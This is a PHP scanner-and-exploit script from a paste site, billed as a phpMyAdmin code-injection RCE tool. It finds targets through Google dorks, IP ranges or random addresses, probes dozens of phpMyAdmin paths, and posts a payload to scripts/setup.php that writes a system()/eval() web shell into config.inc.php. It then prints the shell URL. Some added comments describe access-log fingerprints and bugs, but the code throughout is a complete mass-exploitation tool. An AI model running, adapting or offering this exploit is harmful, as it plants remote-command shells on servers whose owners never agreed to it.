Gh05t666include

(scanner) PHP my admin code

Jul 21st, 2020
<?php

// Runtime setup for a long-running interactive CLI scan. Every diagnostic is
// silenced (error_reporting(0) together with display_errors=0), so any failure
// inside the probe/exploit code further down is invisible unless it happens to
// be written to pmaPWN.log. allow_url_fopen is switched on, which makes the
// file_get_contents() call in option 4 accept URLs as well as local paths.
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '256M');
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
/*
* ***************************************************************
Fucking ur mom by indoghostsec

Anonroz team , Banyuwangi blackhat , Silent X team , Anonymous all Indonesia , AnonID , AnonPL , Anonghost
* ***************************************************************

EDITADO POR GoogleINURL
blog.inurl.com.br
*/


// Candidate phpMyAdmin install directories that the scan loop below requests
// on every target host, in parallel via curl_multi. Each entry is appended
// directly to the host URL ("http://<host>" . $list[$i]), so every entry must
// start and end with "/". From a defender's side, a burst of GETs for these
// paths from a single client, followed by scripts/setup.php and
// config/config.inc.php, is this scanner's access-log fingerprint.
$list = array(
    '/phpmyadmin/',
    '/phpMyAdmin/',
    '/PMA/',
    '/pma/',
    '/admin/',
    '/dbadmin/',
    '/mysql/',
    '/myadmin/',
    '/phpmyadmin2/',
    '/phpMyAdmin2/',
    '/phpMyAdmin-2/',
    '/php-my-admin/',
    '/phpMyAdmin-2.2.3/',
    '/phpMyAdmin-2.2.6/',
    '/phpMyAdmin-2.5.1/',
    '/phpMyAdmin-2.5.4/',
    '/phpMyAdmin-2.5.5-rc1/',
    '/phpMyAdmin-2.5.5-rc2/',
    '/phpMyAdmin-2.5.5/',
    '/phpMyAdmin-2.5.5-pl1/',
    '/phpMyAdmin-2.5.6-rc1/',
    '/phpMyAdmin-2.5.6-rc2/',
    '/phpMyAdmin-2.5.6/',
    '/phpMyAdmin-2.5.7/',
    '/phpMyAdmin-2.5.7-pl1/',
    '/phpMyAdmin-2.6.0-alpha/',
    '/phpMyAdmin-2.6.0-alpha2/',
    '/phpMyAdmin-2.6.0-beta1/',
    '/phpMyAdmin-2.6.0-beta2/',
    '/phpMyAdmin-2.6.0-rc1/',
    '/phpMyAdmin-2.6.0-rc2/',
    '/phpMyAdmin-2.6.0-rc3/',
    '/phpMyAdmin-2.6.0/',
    '/phpMyAdmin-2.6.0-pl1/',
    '/phpMyAdmin-2.6.0-pl2/',
    '/phpMyAdmin-2.6.0-pl3/',
    '/phpMyAdmin-2.6.1-rc1/',
    '/phpMyAdmin-2.6.1-rc2/',
    '/phpMyAdmin-2.6.1/',
    '/phpMyAdmin-2.6.1-pl1/',
    '/phpMyAdmin-2.6.1-pl2/',
    '/phpMyAdmin-2.6.1-pl3/',
    '/phpMyAdmin-2.6.2-rc1/',
    '/phpMyAdmin-2.6.2-beta1/',
    '/phpMyAdmin-2.6.2-rc1/',
    '/phpMyAdmin-2.6.2/',
    '/phpMyAdmin-2.6.2-pl1/',
    '/phpMyAdmin-2.6.3/',
    '/phpMyAdmin-2.6.3-rc1/',
    '/phpMyAdmin-2.6.3/',
    '/phpMyAdmin-2.6.3-pl1/',
    '/phpMyAdmin-2.6.4-rc1/',
    '/phpMyAdmin-2.6.4-pl1/',
    '/phpMyAdmin-2.6.4-pl2/',
    '/phpMyAdmin-2.6.4-pl3/',
    '/phpMyAdmin-2.6.4-pl4/',
    '/phpMyAdmin-2.6.4/',
    '/phpMyAdmin-2.7.0-beta1/',
    '/phpMyAdmin-2.7.0-rc1/',
    '/phpMyAdmin-2.7.0-pl1/',
    '/phpMyAdmin-2.7.0-pl2/',
    '/phpMyAdmin-2.7.0/',
    '/phpMyAdmin-2.8.0-beta1/',
    '/phpMyAdmin-2.8.0-rc1/',
    '/phpMyAdmin-2.8.0-rc2/',
    '/phpMyAdmin-2.8.0/',
    '/phpMyAdmin-2.8.0.1/',
    '/phpMyAdmin-2.8.0.2/',
    '/phpMyAdmin-2.8.0.3/',
    '/phpMyAdmin-2.8.0.4/',
    '/phpMyAdmin-2.8.1-rc1/',
    '/phpMyAdmin-2.8.1/',
    '/phpMyAdmin-2.8.2/',
    '/sqlmanager/',
    '/mysqlmanager/',
    '/p/m/a/',
    '/PMA2005/',
    '/pma2005/',
    '/phpmanager/',
    '/php-myadmin/',
    '/phpmy-admin/',
    '/webadmin/',
    '/sqlweb/',
    '/websql/',
    '/webdb/',
    '/mysqladmin/',
    '/mysql-admin/',
);
  110.  
  111. function filterHost($array = array()) {
  112. if (!empty($array)) {
  113. foreach ($array as $value) {
  114. $real = parse_url("http://{$value}");
  115. $_[] = "http://" . $real['host'];
  116. }
  117.  
  118. return array_filter(array_unique($_));
  119. } else {
  120.  
  121. return NULL;
  122. }
  123. }
  124.  
  125. ################################################################################
  126. #GENERATOR RANGE IP#############################################################
  127. ################################################################################
  128.  
  129. function __generatorRangeIP($range) {
  130.  
  131. $ip_ = explode(',', $range);
  132. if (is_array($ip_)) {
  133.  
  134. $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  135. while ($_[0] <= $_[1]) {
  136.  
  137. $ips[] = "http://" . long2ip($_[0]);
  138. $_[0] ++;
  139. }
  140. } else {
  141.  
  142. return FALSE;
  143. }
  144.  
  145. return $ips;
  146. }
  147.  
  148. ################################################################################
  149. #GENERATOR RANGE IP RANDOM######################################################
  150. ################################################################################
  151.  
  152. function __generatorIPRandom($cont) {
  153.  
  154. $cont[0] = 0;
  155. while ($cont[0] < $cont[1]) {
  156.  
  157. $bloc[0] = rand(0, 255);
  158. $bloc[1] = rand(0, 255);
  159. $bloc[2] = rand(0, 255);
  160. $bloc[3] = rand(0, 255);
  161. $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
  162.  
  163. $cont[0] ++;
  164. }
  165. return array_unique($ip);
  166. }
  167.  
$banner = "
\t---------------------------------------------------------------
\t phpMyAdmin Code Injection RCE Scanner & Exploit
\t This is PHP version original http://milw0rm.com/exploits/8921
\t Edited by GoogleINURL - http://blog.inurl.com.br
\t---------------------------------------------------------------
\n";

// Any command-line argument prints the usage line and exits; every real input
// (menu choice, dork, range, file name) is read interactively from STDIN.
if ($argc > 1) {
    print $banner;
    print "Usage: php $argv[0] \n";
    exit;
}

print $banner;
print "\n";
// Session log in the current working directory. It is closed and reopened in
// append mode at several points below rather than held open for the whole run.
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, $banner);

print "[-] Master, where you want to go today? \n";
print "[-] OPTIONS: \n";
print "---------------------------------------------------------------------\n";
print "[+] DORKING: [ 1 ]\n";
print "[+] RANGE IP: [ 2 ]\n";
print "[+] RANGE IP RANDOM: [ 3 ]\n";
print "[+] VALUES FILE: [ 4 ]\n";
print "---------------------------------------------------------------------\n";
fwrite(STDOUT, "\nGoogleINURL@scan:/options# ");
// $op stays a string; the loose == below is what lets "1" match 1.
$op = trim(fgets(STDIN));

// Option 1: collect target hosts from a single Google results page for the
// given dork (the commented-out loop suggests paging was once intended).
if ($op == 1) {
    print "[-] example: intitle:phpMyAdmin\n";
    fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork# ");
    $dork = urlencode(trim(fgets(STDIN)));
    print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
    FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
    //for($i = 0; $i <= 2; $i+=100) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    $pg = curl_exec($ch);
    curl_close($ch);

    # Search engine and validation regex modified by GoogleINURL - 26/jun/2015
    // Unwrap Google's redirect links and drop self-references so that the
    // regex below sees plain target URLs.
    $html = str_replace('href="/url?q=', 'href="', $pg);
    $html = str_replace('https://www.google.com.br', '', $html);
    $html = str_replace('http://www.phpmyadmin.net', '', $html);

    // Group 2 is everything after the scheme of each <h3 class="r"> result
    // anchor; the selector is tied to the 2015-era result-page markup.
    preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
    $_ = array_filter(array_unique($links[2]));

    //if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
    //}
    $res = filterHost($_);
}

// Option 2: inclusive "start,end" IPv4 range.
if ($op == 2) {
    print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
    fwrite(STDOUT, "GoogleINURL@scan:/options/set_range# ");
    $value = (trim(fgets(STDIN)));
    $res = __generatorRangeIP($value);
}

// Option 3: N random IPv4 addresses. Only index 1 (the count) is read by the
// generator; index 0 is reset inside it.
if ($op == 3) {
    print "\n[-] Amount of IPS / example: 255 \n";
    fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand# ");
    $value = (trim(fgets(STDIN)));
    $res = __generatorIPRandom(array([0] => 0, 1 => $value));
}

// Option 4: one target per line from a file. Lines are used verbatim (no
// "http://" is prepended here), and since allow_url_fopen was enabled at the
// top of the file, a URL is accepted in place of a local path.
if ($op == 4) {
    print "[-] example: hosts.txt ";
    fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file# ");
    $value = (trim(fgets(STDIN)));
    $res = array_unique(array_filter(explode("\n", file_get_contents($value))));
}



// Abort when no option produced targets. empty() is already true for an unset
// variable, so the isset() part of the condition adds nothing.
(!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
print "---------------------------------------------------------------------\n";
$total = count($res);
print "\n[+] Done. $total rows return.\n";
FWrite($Handlex, "[+] Done. $total rows return.\n");
FClose($Handlex);

// Scan loop: for every target, request all $list paths in parallel through a
// curl_multi handle, then look for phpMyAdmin markers in each response body.
// A fixed sleep(5) runs before and after each host.
// foreach($res as $key) {
$cont = 1;
foreach ($res as $url) {

    $Handlex = FOpen("pmaPWN.log", "a+");
    //$real = parse_url("http://{$target}");
    //$url = "http://" . $real['host'];
    print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
    $cont++;
    FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
    FClose($Handlex);
    sleep(5);
    $curlHandle = curl_multi_init();
    // One easy handle per candidate path; addHandle() attaches it to $curlHandle.
    for ($i = 0; $i < count($list); $i++)
        $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
    ExecHandle($curlHandle);
    for ($i = 0; $i < count($list); $i++) {
        $text[$i] = curl_multi_getcontent($curl[$i]);
        //echo $url.$list[$i]."\n";
        // NOTE: this handle is only closed inside the if-branch below, so a
        // non-matching path leaks one open log handle per iteration.
        $Handlex = FOpen("pmaPWN.log", "a+");
        // `and` binds tighter than `or`, so this reads as
        // A or (B and C): a phpMyAdmin title, or an "Access denied" title on a
        // page that still mentions phpMyAdmin.
        if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
            print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
            print "\n[+] Testing vulnerable, wait sec..\n";
            FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
            FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
            // The script treats this phrase as a sign that the index page was
            // served without a login prompt; it is only reported, not acted on.
            if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
                print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
                FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
            }
            FClose($Handlex);
            exploit_site($url . $list[$i]);
        }
    }
    for ($i = 0; $i < count($list); $i++)//remove the handles
        curl_multi_remove_handle($curlHandle, $curl[$i]);
    curl_multi_close($curlHandle);
    sleep(5);
}

// }
  300. function addHandle(&$curlHandle, $url) {
  301. $cURL = curl_init();
  302. curl_setopt($cURL, CURLOPT_URL, $url);
  303. curl_setopt($cURL, CURLOPT_HEADER, 0);
  304. curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  305. curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  306. curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT, 10);
  307. curl_multi_add_handle($curlHandle, $cURL);
  308. return $cURL;
  309. }
  310.  
//execute the handle until the flag passed
// to function is greater than 0
  313. function ExecHandle(&$curlHandle) {
  314. $flag = null;
  315. do {
  316. //fetch pages in parallel
  317. curl_multi_exec($curlHandle, $flag);
  318. } while ($flag > 0);
  319. }
  320.  
/**
 * Probe a discovered phpMyAdmin directory for the setup-script weakness the
 * banner refers to (milw0rm 8921) and hand it to exploit() on a match.
 *
 * Two unauthenticated GETs are issued: <url>scripts/setup.php (headers
 * included in the response) and <url>config/config.inc.php (body only). The
 * install is treated as a candidate only when the first response contains
 * "200 OK" and "token" and the second also contains "200 OK"; otherwise a
 * "not vulnerable" line is logged. Detection note: these two paths requested
 * back-to-back by one client, immediately after a sweep of the $list
 * directories, are this scanner's signature in access logs.
 *
 * @param string $url base URL of the phpMyAdmin directory, with trailing slash
 * @return void
 */
function exploit_site($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 100);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
    $result = curl_exec($ch);
    curl_close($ch);
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
    // The next two calls target $ch (already closed), not $ch2, so the second
    // request runs with cURL's default timeouts.
    curl_setopt($ch, CURLOPT_TIMEOUT, 100);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
    $result2 = curl_exec($ch2);
    curl_close($ch2);
    //print $url;
    if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
        print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
        print "\n[+] Exploiting, wait sec..\n";
        $Handlex = FOpen("pmaPWN.log", "a+");
        FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
        FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
        FClose($Handlex);
        exploit($url);
    } else {
        $Handlex = FOpen("pmaPWN.log", "a+");
        print "\n[-] Shit! no luck.. not vulnerable\n";
        FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
        FClose($Handlex);
    }
}
  353.  
/**
 * Attempt the setup.php configuration-save injection against $w00t.
 *
 * Flow as written: (1) GET scripts/setup.php with a cookie jar to obtain a
 * session cookie and a form token; (2) POST a serialized "configuration"
 * whose host field carries PHP code, which a vulnerable setup script writes
 * into config/config.inc.php; (3) print the URL where that code is expected
 * to answer. Cookies live in exploitcookie.txt in the working directory and
 * are removed at the end; progress is appended to pmaPWN.log.
 *
 * Defender notes, all visible in the requests this function sends: the POST
 * goes to scripts/setup.php with action=save and a serialized-array
 * `configuration=` body; the planted code reads the `c` and `p` query
 * parameters of config/config.inc.php; TLS certificate verification is
 * disabled on both requests; the User-Agent is a fixed Firefox 2 string.
 *
 * On the "no token" path the function returns before FClose(), so the log
 * handle and the cookie file are left behind.
 *
 * @param string $w00t base URL of the phpMyAdmin directory, with trailing slash
 * @return false|null false when no token was found, otherwise null
 */
function exploit($w00t) {
    $Handlex = FOpen("pmaPWN.log", "a+");
    $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
    //first get cookie + token
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 100);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
    curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
    curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
    $result = curl_exec($curl);
    curl_close($curl);
    // The if has an empty body (the lone ";"), so $matches is read
    // unconditionally below whether or not anything matched.
    if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
    ;

    $token = $matches[1][1];
    if ($token != '') {
        print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
        FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
        $payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
        print "\n[+] Sending evil payload mwahaha.. \n";
        FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
        // Second request: same cookie jar, Referer set to the target itself.
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
        curl_setopt($curl, CURLOPT_TIMEOUT, 200);
        curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
        curl_setopt($curl, CURLOPT_REFERER, $w00t);
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
        $result = curl_exec($curl);
        curl_close($curl);

        // Success is assumed, not verified: $result from the POST is never
        // inspected before the "shell here" message is printed.
        print "\n[!] w00t! w00t! You should now have shell here";
        print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
        print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
        FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
        FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
    } else {
        print "\n[!] Shit! no luck.. not vulnerable\n";
        FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
        return false;
    }
    FClose($Handlex);
    if (file_exists('exploitcookie.txt')) {
        unlink('exploitcookie.txt');
    }
    //exit();
}